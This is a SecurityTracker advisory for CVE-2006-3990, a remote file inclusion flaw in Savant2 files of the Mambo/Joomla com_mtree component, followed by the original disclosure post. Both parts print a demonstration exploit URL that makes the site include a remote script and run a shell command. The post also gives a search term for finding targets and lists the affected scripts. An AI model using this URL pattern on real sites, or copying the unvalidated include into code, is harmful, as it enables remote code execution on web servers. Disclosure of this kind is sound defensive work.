Savant2 Include File Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1016560 |
|
SecurityTracker URL: http://securitytracker.com/id/1016560
|
|
CVE Reference:
CVE-2006-3990
(Links to External Site)
|
Updated: Jun 13 2008
|
Original Entry Date: Jul 24 2006
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
|
Description:
A vulnerability was reported in Savant2. A remote user can include and execute arbitrary code on the target system.
The software does not properly validate user-supplied input in the 'mosConfig_absolute_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id
Several other scripts are also affected, including:
Savant2_Compiler_basic.php
Savant2_Error_pear.php
Savant2_Error_stack.php
Savant2_Filter_colorizeCode.php
Savant2_Filter_trimwhitespace.php
Savant2_Plugin_ahref.php
Savant2_Plugin_ahrefcontact.php
Savant2_Plugin_ahreflisting.php
Savant2_Plugin_ahreflistingimage.php
Savant2_Plugin_ahrefmap.php
Savant2_Plugin_ahrefownerlisting.php
Savant2_Plugin_ahrefprint.php
Savant2_Plugin_ahrefrating.php
Savant2_Plugin_ahrefrecommend.php
Savant2_Plugin_ahrefreport.php
Savant2_Plugin_ahrefreview.php
Savant2_Plugin_ahrefvisit.php
Savant2_Plugin_checkbox.php
Savant2_Plugin_cycle.php
Savant2_Plugin_dateformat.php
Savant2_Plugin_editor.php
Savant2_Plugin_form.php
Savant2_Plugin_image.php
Savant2_Plugin_input.php
Savant2_Plugin_javascript.php
Savant2_Plugin_listalpha.php
Savant2_Plugin_listingname.php
Savant2_Plugin_modify.php
Savant2_Plugin_mtpath.php
Savant2_Plugin_options.php
Savant2_Plugin_radios.php
Savant2_Plugin_rating.php
Savant2_Plugin_stylesheet.php
Savant2_Plugin_textarea.php
botan reported this vulnerability.
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.phpsavant.com/yawiki/ (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: 21 Jul 2006 16:18:12 -0000
Subject: [Kurdish Security # 13] Savant2 Remote File Include Vulnerability
|
>>> Kurdish Security
>>> Savant2 Remote File Include Vulnerability
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhac % www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : Savant2
>>> Site : www.phpsavant.com
>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends
d0rkiz : "com_mtree"
----------------------------------------------------------------------------------
/**
* Base plugin class.
*/
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/components/com_mtree/Savant2/Plugin.php';
/**
For mambo and joomla
http://www.site.com/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id
used link :]
Savant2_Compiler_basic.php
Savant2_Error_pear.php
Savant2_Error_stack.php
Savant2_Filter_colorizeCode.php
Savant2_Filter_trimwhitespace.php
Savant2_Plugin_ahref.php
Savant2_Plugin_ahrefcontact.php
Savant2_Plugin_ahreflisting.php
Savant2_Plugin_ahreflistingimage.php
Savant2_Plugin_ahrefmap.php
Savant2_Plugin_ahrefownerlisting.php
Savant2_Plugin_ahrefprint.php
Savant2_Plugin_ahrefrating.php
Savant2_Plugin_ahrefrecommend.php
Savant2_Plugin_ahrefreport.php
Savant2_Plugin_ahrefreview.php
Savant2_Plugin_ahrefvisit.php
Savant2_Plugin_checkbox.php
Savant2_Plugin_cycle.php
Savant2_Plugin_dateformat.php
Savant2_Plugin_editor.php
Savant2_Plugin_form.php
Savant2_Plugin_image.php
Savant2_Plugin_input.php
Savant2_Plugin_javascript.php
Savant2_Plugin_listalpha.php
Savant2_Plugin_listingname.php
Savant2_Plugin_modify.php
Savant2_Plugin_mtpath.php
Savant2_Plugin_options.php
Savant2_Plugin_radios.php
Savant2_Plugin_rating.php
Savant2_Plugin_stylesheet.php
Savant2_Plugin_textarea.php
|
|
